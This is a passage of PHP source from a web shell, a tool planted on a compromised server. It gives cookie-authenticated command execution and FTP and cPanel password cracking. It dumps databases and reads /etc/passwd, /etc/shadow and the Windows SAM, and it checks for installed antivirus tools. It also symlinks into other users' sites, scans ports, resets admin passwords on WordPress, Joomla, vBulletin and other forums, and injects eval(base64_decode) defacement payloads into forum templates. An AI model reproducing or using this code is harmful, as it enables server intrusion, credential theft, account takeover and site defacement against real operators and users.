$k) { $row[$j] = "'".mysql_escape_string($k)."'"; } write("INSERT INTO $i VALUES(".implode(",", $row).");"); } } } fclose ($fp); header("Content-Disposition: attachment; filename=" . $file); header("Content-Type: application/download"); header("Content-Length: " . filesize($file)); flush(); $fp = fopen($file, "r"); while (!feof($fp)) { echo fread($fp, 65536); flush(); } fclose($fp); } } function shellstyle() { echo ""; } if(isset($_COOKIE['hacked']) && $_COOKIE['hacked']==md5($pass)) { $self=$_SERVER["PHP_SELF"]; $os = "N/D"; $bdmessage = null; $dir = getcwd(); if(stristr(php_uname(),"Windows")) { $SEPARATOR = '\\'; $os = "Windows"; $directorysperator="\\"; } else if(stristr(php_uname(),"Linux")) { $os = "Linux"; $directorysperator='/'; } function Trail($d,$directsperator) { $d=explode($directsperator,$d); array_pop($d); array_pop($d); $str=implode($d,$directsperator); return $str; } function ftp_check($host,$user,$pass,$timeout) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "ftp://$host"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_FTPLISTONLY, 1); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print " Error : Connection Timeout. Please Check The Target Hostname .";exit; } else if ( curl_errno($ch) == 0 ) { print "[~] Cracking Success With Username "$user\" and Password \"$pass\"

"; } curl_close($ch); } function cpanel_check($host,$user,$pass,$timeout) { global $cpanel_port; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "http://$host:" . $cpanel_port); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC); curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass"); curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout); curl_setopt($ch, CURLOPT_FAILONERROR, 1); $data = curl_exec($ch); if ( curl_errno($ch) == 28 ) { print "Error : Connection Timeout. Please Check The Target Hostname.";exit;} else if ( curl_errno($ch) == 0 ){ print "[~] Cracking Success With Username "$user\" and Password \"$pass\"

"; } curl_close($ch); } // Database functions function listdatabase() { $self=$_SERVER["PHP_SELF"]; ?>

\n"; $pDB = mysql_list_dbs( $mysqlHandle ); $num = mysql_num_rows( $pDB ); for( $i = 0; $i < $num; $i++ ) { $dbname = mysql_dbname( $pDB, $i ); mysql_select_db($dbname,$mysqlHandle); $result = mysql_query("SHOW TABLES"); $num_of_tables = mysql_num_rows($result); echo "\n"; echo "$dbname ($num_of_tables)\n"; echo "Tables\n"; echo "Drop\n"; echo "Dump\n"; echo "\n"; } echo "\n"; mysql_close($mysqlHandle); } function listtable() { $self=$_SERVER["PHP_SELF"]; $dbserver = $_COOKIE["dbserver"]; $dbuser = $_COOKIE["dbuser"]; $dbpass = $_COOKIE["dbpass"]; $dbname = $_GET['dbname']; echo "

[ $dbname ] - > Database List [ Log Out ]

"; ?>

Error : $msg

\n"; return; } $num = mysql_num_rows( $pTable ); echo "\n"; for( $i = 0; $i < $num; $i++ ) { $tablename = mysql_tablename( $pTable, $i ); $result = mysql_query("select * from $tablename"); $num_rows = mysql_num_rows($result); echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; echo "\n"; } echo "
\n"; echo "$tablename ($num_rows)\n"; echo " \n"; echo "Schema\n"; echo " \n"; echo "Data\n"; echo " \n"; echo "Empty\n"; echo " \n"; echo "Drop\n"; echo "
"; mysql_close($mysqlHandle); echo "

[ $dbname ] - > Database List [ Log Out ]

"; } function paramexe($n, $v) { $v = trim($v); if($v) { echo '' . $n . ': '; if(strpos($v, "\n") === false) echo '' . $v . '
'; else echo '

' . $v . '

'; } } function rrmdir($dir) { if (is_dir($dir)) // ensures that we actually have a directory { $objects = scandir($dir); // gets all files and folders inside foreach ($objects as $object) { if ($object != '.' && $object != '..') { if (is_dir($dir . '/' . $object)) { // if we find a directory, do a recursive call rrmdir($dir . '/' . $object); } else { // if we find a file, simply delete it unlink($dir . '/' . $object); } } } // the original directory is now empty, so delete it rmdir($dir); } } function which($pr) { $path = execmd("which $pr"); if(!empty($path)) return trim($path); else return trim($pr); } function magicboom($text) { if (!get_magic_quotes_gpc()) return $text; return stripslashes($text); } function execmd($cmd,$d_functions="None") { if($d_functions=="None") { $ret=passthru($cmd); return $ret; } $funcs=array("shell_exec","exec","passthru","system","popen","proc_open"); $d_functions=str_replace(" ","",$d_functions); $dis_funcs=explode(",",$d_functions); foreach($funcs as $safe) { if(!in_array($safe,$dis_funcs)) { if($safe=="exec") { $ret=@exec($cmd); $ret=join("\n",$ret); return $ret; } elseif($safe=="system") { $ret=@system($cmd); return $ret; } elseif($safe=="passthru") { $ret=@passthru($cmd); return $ret; } elseif($safe=="shell_exec") { $ret=@shell_exec($cmd); return $ret; } elseif($safe=="popen") { $ret=@popen("$cmd",'r'); if(is_resource($ret)) { while(@!feof($ret)) $read.=@fgets($ret); @pclose($ret); return $read; } return -1; } elseif($safe="proc_open") { $cmdpipe=array( 0=>array('pipe','r'), 1=>array('pipe','w') ); $resource=@proc_open($cmd,$cmdpipe,$pipes); if(@is_resource($resource)) { while(@!feof($pipes[1])) $ret.=@fgets($pipes[1]); @fclose($pipes[1]); @proc_close($resource); return $ret; } return -1; } } } return -1; } function getDisabledFunctions() { if(!ini_get('disable_functions')) { return "None"; } else { return @ini_get('disable_functions'); } } function getFilePermissions($file) { $perms = fileperms($file); if (($perms & 0xC000) == 0xC000) { // Socket $info = 's'; } elseif (($perms & 0xA000) == 0xA000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= (($perms & 0x0100) ? 'r' : '-'); $info .= (($perms & 0x0080) ? 'w' : '-'); $info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-')); // Group $info .= (($perms & 0x0020) ? 'r' : '-'); $info .= (($perms & 0x0010) ? 'w' : '-'); $info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-')); // World $info .= (($perms & 0x0004) ? 'r' : '-'); $info .= (($perms & 0x0002) ? 'w' : '-'); $info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-')); return $info; } function filepermscolor($filename) { if(!@is_readable($filename)) return "".getFilePermissions($filename).""; else if(!@is_writable($filename)) return "".getFilePermissions($filename).""; else return "".getFilePermissions($filename).""; } function yourip() { echo $_SERVER["REMOTE_ADDR"]; } function phpver() { $pv=@phpversion(); echo $pv; } function magic_quote() { echo get_magic_quotes_gpc()?"ON":"OFF"; } function serverip() { echo getenv('SERVER_ADDR'); } function serverport() { echo $_SERVER['SERVER_PORT']; } function safe() { global $sm; return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF"; } function serveradmin() { echo $_SERVER['SERVER_ADMIN']; } function systeminfo() { echo php_uname(); } function curlinfo() { echo function_exists('curl_version')?("Enabled"):("Disabled"); } function oracleinfo() { echo function_exists('ocilogon')?("Enabled"):("Disabled"); } function mysqlinfo() { echo function_exists('mysql_connect')?("Enabled"):("Disabled"); } function mssqlinfo() { echo function_exists('mssql_connect')?("Enabled"):("Disabled"); } function postgresqlinfo() { echo function_exists('pg_connect')?("Enabled"):("Disabled"); } function softwareinfo() { echo getenv("SERVER_SOFTWARE"); } function download() { $frd=$_GET['download']; $prd=explode("/",$frd); for($i=0;$i $mod; $i++) { $size /= $mod; } return round($size, 2) . ' ' . $units[$i]; } function showDrives() { global $self; foreach(range('A','Z') as $drive) { if(is_dir($drive.':\\')) { $myd = $drive.":\\"; ?> ' . $n . ': '; if(strpos($v, "\n") === false) echo '' . $v . '
'; else echo '

' . $v . '

'; } } myparam('Server software', @getenv('SERVER_SOFTWARE')); if(function_exists('apache_get_modules')) myparam('Loaded Apache modules', implode(', ', apache_get_modules())); myparam('Open base dir', @ini_get('open_basedir')); myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir')); myparam('Safe mode include dir', @ini_get('safe_mode_include_dir')); $temp=array(); if(function_exists('mysql_get_client_info')) $temp[] = "MySql (".mysql_get_client_info().")"; if(function_exists('mssql_connect')) $temp[] = "MSSQL"; if(function_exists('pg_connect')) $temp[] = "PostgreSQL"; if(function_exists('oci_connect')) $temp[] = "Oracle"; myparam('Supported databases', implode(', ', $temp)); echo '
'; if($GLOBALS['os'] == 'Linux') { myparam('Distro : ', myexe("cat /etc/*-release")); myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes [view]":'no'); myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes [view]":'no'); myparam('OS version', @file_get_contents('/proc/version')); myparam('Distr name', @file_get_contents('/etc/issue.net')); myparam('Where is Perl?', myexe('whereis perl')); myparam('Where is Python?', myexe('whereis python')); myparam('Where is gcc?', myexe('whereis gcc')); myparam('Where is apache?', myexe('whereis apache')); myparam('CPU?', myexe('cat /proc/cpuinfo')); myparam('RAM', myexe('free -m')); myparam('Mount options', myexe('cat /etc/fstab')); myparam('User Limits', myexe('ulimit -a')); if(!$GLOBALS['safe_mode']) { $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl'); $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja'); $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror'); echo '
'; $temp=array(); foreach ($userful as $item) if(thiscmd($item)) $temp[] = $item; myparam('Userful', implode(', ',$temp)); $temp=array(); foreach ($danger as $item) if(thiscmd($item)) $temp[] = $item; myparam('Danger', implode(', ',$temp)); $temp=array(); foreach ($downloaders as $item) if(thiscmd($item)) $temp[] = $item; myparam('Downloaders', implode(', ',$temp)); echo '
'; myparam('HDD space', myexe('df -h')); myparam('Hosts', @file_get_contents('/etc/hosts')); } } else { $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam"); $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts"); $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks"); $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam"); echo "Password File : Download password file
"; echo "Config Files : [ Hosts ] [ Local Network Map ] [ lmhosts ]
"; $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; echo "Open Base Dir : " . $base . "
"; myparam('OS Version',myexe('ver')); myparam('Account Settings',myexe('net accounts')); myparam('User Accounts',myexe('net user')); } echo ''; } function myexe($in) { $out = ''; if (function_exists('exec')) { @exec($in,$out); $out = @join("\n",$out); } elseif (function_exists('passthru')) { ob_start(); @passthru($in); $out = ob_get_clean(); } elseif (function_exists('system')) { ob_start(); @system($in); $out = ob_get_clean(); } elseif (function_exists('shell_exec')) { $out = shell_exec($in); } elseif (is_resource($f = @popen($in,"r"))) { $out = ""; while(!@feof($f)) $out .= fread($f,1024); pclose($f); } return $out; } function exec_all($command) { $output = ''; if(function_exists('exec')) { exec($command,$output); $output = join("\n",$output); } else if(function_exists('shell_exec')) { $output = shell_exec($command); } else if(function_exists('popen')) { $handle = popen($command , "r"); // Open the command pipe for reading if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { while(!feof($handle)) { $output .= fread($handle, 512); } } else if(function_exists('fgets') && function_exists('feof')) { while(!feof($handle)) { $output .= fgets($handle,512); } } } pclose($handle); } else if(function_exists('system')) { ob_start(); //start output buffering system($command); $output = ob_get_contents(); // Get the ouput ob_end_clean(); // Stop output buffering } else if(function_exists('passthru')) { ob_start(); //start output buffering passthru($command); $output = ob_get_contents(); // Get the ouput ob_end_clean(); // Stop output buffering } else if(function_exists('proc_open')) { $descriptorspec = array( 1 => array("pipe", "w"), // stdout is a pipe that the child will write to ); $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes' if(is_resource($handle)) { if(function_exists('fread') && function_exists('feof')) { while(!feof($pipes[1])) { $output .= fread($pipes[1], 512); } } else if(function_exists('fgets') && function_exists('feof')) { while(!feof($pipes[1])) { $output .= fgets($pipes[1],512); } } } pclose($handle); } return(htmlspecialchars($output)); } $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF"; $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No"; function getOGid($value) { if(!function_exists('posix_getegid')) { $user = @get_current_user(); $uid = @getmyuid(); $gid = @getmygid(); $group = "?"; $owner = $uid . "/". $gid; return $owner; } else { $name=@posix_getpwuid(@fileowner($value)); $group=@posix_getgrgid(@filegroup($value)); $owner = $name['name']. " / ". $group['name']; return $owner; } } function mainfun($dir) { global $ind, $directorysperator,$os; $mydir = basename(dirname(__FILE__)); $pdir = str_replace($mydir,"",$dir); $pdir = str_replace("/","",$dir); $files = array(); $dirs = array(); $odir=opendir($dir); while($file = readdir($odir)) { if(is_dir($dir.'/'.$file)) { $dirs[]=$file; } else { $files[]=$file; } } $countfiles = count($dirs) + count($files); $dircount = count($dirs); $dircount = $dircount-2; $myfiles = array_merge($dirs,$files); $i = 0; if(is_dir($dir)) { if(scandir($dir) === false) echo "Directory isn't readable"; else { ?>

Owner / Group"; } ?> "; echo getOGid($dir).""; } ?> "; echo getOGid($val).""; } ?> "; echo getOGid($val).""; } ?> "; echo getOGid($val).""; } ?>

Check All

"; }} else { echo "

".$_GET['dir']." is NOT a Valid Directory!

"; } } if(isset($_REQUEST["script"])) { $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL); ?>

Name	Size	Rename	Download

Listing folder ()
[ . ]	CURDIR
[ .. ]	UPDIR
[ ]	DIR	Rename
". $val . ""; } else { echo $val; } ?> ( Deface IT )"; } } ?>		Rename	Download

| Do It Manually |

| Do It Automatically |

12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); unlink("test.txt"); echo "[ Done ]"; echo "
| Go Here |"; } else { $d0mains = @file("/etc/named.conf"); if($d0mains) { mkdir("dhanushST"); chdir("dhanushST"); foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); syml($user['name'],$domains[1][0]); } } } echo "[ Done ]"; echo "
| Go Here |"; } else { mkdir("dhanushSPT"); chdir("dhanushSPT"); $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } echo '
'; $temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); echo ""; unlink("test.txt"); echo "[ Done ]"; echo "
| Go Here |"; } } } else echo "Cannot Complete the task!!!!"; } else if(isset($_GET["symlinkfile"])) { if(!isset($_GET['file'])) { ?>

check symlink symlink'.$num.' file'; } else echo 'Cannot Create Symlink'; } else if(isset($_REQUEST['404new'])) { ?> Done setting 404 Page !!!!"; } else echo "Cannot Set 404 Page"; } else if(strlen($ind) != 0) { if($myfile = fopen(".htaccess", "a")) { fwrite($myfile, "ErrorDocument 404 ".$url."404.html \n\r"); if($myfilee = fopen("404.html", "w+")) { fwrite($myfilee, base64_decode($ind)); fclose($myfilee); echo "Done setting 404 Page !!!!"; } fclose($myfile); } else { echo "Cannot Set 404 Page"; } } else echo "Nothing Specified in the shell"; } else if(isset($_GET["domains"])) { ?>S. No.DomainsUsersSymlinkInformation"; $dcount = 1; foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); echo "" . $dcount . "".$domains[1][0]."".$user['name']."Symlinkinfo"; flush(); $dcount++; } } } echo ""; } else { if(stristr(php_uname(),"Linux")) { ?>

Get User Name
Enter Website Name :

S. No.UsersSymlink"; $dcount = 1; $file = fopen("/etc/passwd", "r"); //Output a line of the file until the end is reached while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo "" . $dcount . "" . $matches . ""; echo "Symlink"; $dcount++; } fclose($file); echo ""; } else { @mkdir("dhanush",0777); @chdir("dhanush"); execmd("ln -s / root"); $file3 = 'Options all DirectoryIndex Sux.html AddType text/plain .php AddHandler server-parsed .php AddType text/plain .html AddHandler txt .html Require None Satisfy Any '; $fp3 = fopen('.htaccess','w'); $fw3 = fwrite($fp3,$file3); @fclose($fp3); echo ""; $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } echo '
'; $temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $dcount = 1; $file = fopen("test.txt", "r"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; echo ""; echo ""; $dcount++; } fclose($file); echo "

S. No.	Users	Symlink
" . $dcount . "	" . $matches . "	Symlink

"; unlink("test.txt"); } } else echo "Cannot create Symlink"; } } else if(isset($_GET['host']) && isset($_GET['protocol'])) { echo "Open Ports: "; $host = $_GET['host']; $proto = $_GET['protocol']; $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); for($current = 0; $current <= 23; $current++) { $currents = $myports[$current]; $service = getservbyport($currents, $proto); // Try to connect to port $result = fsockopen($host, $currents, $errno, $errstr, 1); // Show results if($result) echo "$currents, "; } } else if(isset($_REQUEST['forumpass'])) { $localhost = $_GET['f1']; $database = $_GET['f2']; $username = $_GET['f3']; $password = $_GET['f4']; $prefix = $_GET['prefix']; $newpass = $_GET['newpass']; $uid = $_GET['uid']; if($_GET['forums'] == "vb") { $newpass = $_GET['newipbpass']; $uid = $_GET['ipbuid']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); $salt = "eghjghrtd"; $newpassword = md5(md5($newpass) . $salt); if($prefix == "" || $prefix == null) $sql = mysql_query("update user set password = '$newpassword', salt = '$salt' where userid = '$uid'"); else $sql = mysql_query("update ".$prefix."user set password = '$newpassword', salt = '$salt' where userid = '$uid'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "mybb") { $newpass = $_GET['newipbpass']; $uid = $_GET['ipbuid']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); $salt = "jeghj"; $newpassword = md5(md5($salt).md5($newpass)); if($prefix == "" || $prefix == null) $sql = mysql_query("update mybb_users set password = '$newpassword', salt = '$salt' where uid = '$uid'"); else $sql = mysql_query("update ".$prefix."users set password = '$newpassword', salt = '$salt' where uid = '$uid'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "smf") { $newpass = $_GET['newipbpass']; $uid = $_GET['ipbuid']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); if($prefix == "" || $prefix == null) { $result = mysql_query("select member_name from smf_members where id_member = $uid"); $row = mysql_fetch_array($result); $membername = $row['member_name']; $newpassword = sha1(strtolower($membername).$newpass); $sql = mysql_query("update smf_members set passwd = '$newpassword' where id_member = '$uid'"); } else { $result = mysql_query("select member_name from ".$prefix."members where id_member = $uid"); $row = mysql_fetch_array($result); $membername = $row['member_name']; $newpassword = sha1(strtolower($membername).$newpass); $sql = mysql_query("update ".$prefix."members set passwd = '$newpassword' where id_member = '$uid'"); } if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "phpbb") { $newpass = $_POST['newipbpass']; $uid = $_POST['ipbuid']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); $newpassword = md5($newpass); if(empty($prefix) || $prefix == null) $sql = mysql_query("update phpb_users set user_password = '$newpassword' where user_id = '$uid'"); else $sql = mysql_query("update ".$prefix."users set user_password = '$newpassword' where user_id = '$uid'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "ipb") { $newpass = $_POST['newipbpass']; $uid = $_POST['ipbuid']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); $salt = "eghj"; $newpassword = md5(md5($salt).md5($newpass)); if($prefix == "" || $prefix == null) $sql = mysql_query("update members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'"); else $sql = mysql_query("update ".$prefix."members set members_pass_hash = '$newpassword', members_pass_salt = '$salt' where member_id = '$uid'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "wp") { $uname = $_GET['uname']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); $newpassword = md5($newpass); if($prefix == "" || $prefix == null) $sql = mysql_query("update wp_users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'"); else $sql = mysql_query("update ".$prefix."users set user_pass = '$newpassword', user_login = '$uname' where ID = '$uid'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } else if($_GET['forums'] == "joomla") { $newjoomlapass = $_GET['newjoomlapass']; $joomlauname = $_GET['username']; $con = mysql_connect($localhost,$username,$password); $db = mysql_select_db($database,$con); $newpassword = md5($newjoomlapass); if($prefix == "" || $prefix == null) $sql = mysql_query("update jos_users set password = '$newpassword', username = '$joomlauname' where name = 'Super User'"); else $sql = mysql_query("update ".$prefix."users set password = '$newpassword', username = '$joomlauname' where name = 'Super User' OR name = 'Administrator'"); if($sql) { mysql_close($con); echo "Password Changed Successfully"; } else echo "Cannot Change Password"; } } else if(isset($_POST['forumdeface'])) { $localhost = $_POST['f1']; $database = $_POST['f2']; $username = $_POST['f3']; $password = $_POST['f4']; $index = $_POST['index']; $prefix = $_POST['tableprefix']; if($_POST['forumdeface'] == "vb") { $con =@ mysql_connect($localhost,$username,$password); $db =@ mysql_select_db($database,$con); $index=str_replace('"','\\"',$index); $attack = "{\${eval(base64_decode(\'"; $attack .= base64_encode("echo \"$index\";"); $attack .= "\'))}}{\${exit()}}"; if($prefix == "" || $prefix == null) $query = "UPDATE template SET template = '$attack'"; else $query = "UPDATE ".$prefix."template SET template = '$attack'"; $result =@ mysql_query($query,$con); if($result) echo "Vbulletin Forum Defaced Successfully"; else echo "Cannot Deface Vbulletin Forum"; } else if($_POST['forumdeface'] == "mybb") { $con =@ mysql_connect($localhost,$username,$password); $db =@ mysql_select_db($database,$con); $attack = "{\${eval(base64_decode(\'"; $attack .= base64_encode("echo \"$index\";"); $attack .= "\'))}}{\${exit()}}"; $attack = str_replace('"',"\\'",$attack); if($prefix == "" || $prefix == null) $query = "UPDATE mybb_templates SET template = '$attack'"; else $query = "UPDATE ".$prefix."templates SET template = '$attack'"; $result =@ mysql_query($query,$con); if($result) echo "Mybb Forum Defaced Successfully"; else echo "Cannot Deface Mybb Forum"; } else if($_POST['forumdeface'] == "smf") { $head = $_POST['head']; $catid = $_POST['f5']; $con =@ mysql_connect($localhost,$username,$password); $db =@ mysql_select_db($database,$con); if($prefix == "" || $prefix == null) $query = "UPDATE boards SET name='$head', description='$index' WHERE id_cat='$catid'"; else $query = "UPDATE ".$prefix."boards SET name='$head', description='$index' WHERE id_cat='$catid'"; $result =@ mysql_query($query,$con); if($result) echo "SMF Forum Index Changed Successfully"; else echo "Cannot Deface SMF Forum"; } else if($_POST['forumdeface'] == "ipb") { $head = $_POST['head']; $catid = $_POST['f5']; $IPB = "forums"; $con =@ mysql_connect($localhost,$username,$password); $db =@ mysql_select_db($database,$con); if($prefix == "" || $prefix == null) $result =@mysql_query($query = "UPDATE $IPB SET name = '$head', description = '$index' where id = '$catid'"); else $result =@mysql_query($query = "UPDATE $prefix.$IPB SET name = '$head', description = '$index' where id = '$catid'"); if($result) echo "Forum Defaced Successfully"; else echo "Cannot Deface Forum"; } else if($_POST['forumdeface'] == "wp") { $catid = $_POST['f5']; $head = $_POST['head']; $con =@ mysql_connect($localhost,$username,$password); $db =@ mysql_select_db($database,$con); if($prefix == "" || $prefix == null) { if(isset($_POST["alll"]) && $_POST["alll"] == "All") $query = "UPDATE wp_posts SET post_title='$head', post_content='$index'"; else $query = "UPDATE wp_posts SET post_title='$head', post_content='$index' WHERE ID='$catid'"; } else { if(isset($_POST["alll"]) && $_POST["alll"] == "All") $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index'"; else $query = "UPDATE ".$prefix."posts SET post_title='$head', post_content='$index' WHERE ID='$catid'"; } $result =@mysql_query($query,$con) or mysql_error(); if($result) echo "Wordpress Defaced Successfully"; else echo "Cannot Deface Wordpress"; } else if($_POST['forumdeface'] == "joomla") { $site_url = $_POST['siteurl']; $dbprefix = $_POST['tableprefix']; $dbname = $_POST['f2']; $h=""; function randomt() { $chars = "abcdefghijkmnopqrstuvwxyz023456789"; srand((double)microtime()*1000000); $i = 0; $pass = '' ; while ($i <= 7) { $num = rand() % 33; $tmp = substr($chars, $num, 1); $pass = $pass . $tmp; $i++; } return $pass; } function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1) { $ar0=explode($marqueurDebutLien, $text); $ar1=explode($marqueurFinLien, $ar0[$i]); $ar=trim($ar1[0]); return $ar; } $co=randomt(); $link=mysql_connect($localhost,$username,$password) ; mysql_select_db($dbname,$link); $tryChaningInfo = mysql_query("UPDATE ".$dbprefix."users SET username ='admin' , password = '2a9336f7666f9f474b7a8f67b48de527:DiWqRBR1thTQa2SvBsDqsUENrKOmZtAX'"); $req =mysql_query("SELECT * from `".$dbprefix."extensions` "); if ( $req ) { $req =mysql_query("SELECT * from `".$dbprefix."template_styles` WHERE client_id='0' and home='1'"); $data = mysql_fetch_array($req); $template_name=$data["template"]; $req =mysql_query("SELECT * from `".$dbprefix."extensions` WHERE name='".$template_name."'"); $data = mysql_fetch_array($req); $template_id=$data["extension_id"]; $url2=$site_url."/index.php"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $return=entre2v2($buffer ,'[-] Login Error"); exit; } $url2=$site_url."/index.php?option=com_templates&task=source.edit&id=".base64_encode($template_id.":index.php"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url2); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_USERAGENT, $useragent); curl_setopt($ch, CURLOPT_COOKIEJAR, $co); curl_setopt($ch, CURLOPT_COOKIEFILE, $co); $buffer = curl_exec($ch); $hidden2=entre2v2($buffer ,'[-] index.php Not found in Theme Editor"); exit; } $url2=$site_url."/index.php?option=com_templates&layout=edit"; $ch = curl_init(); 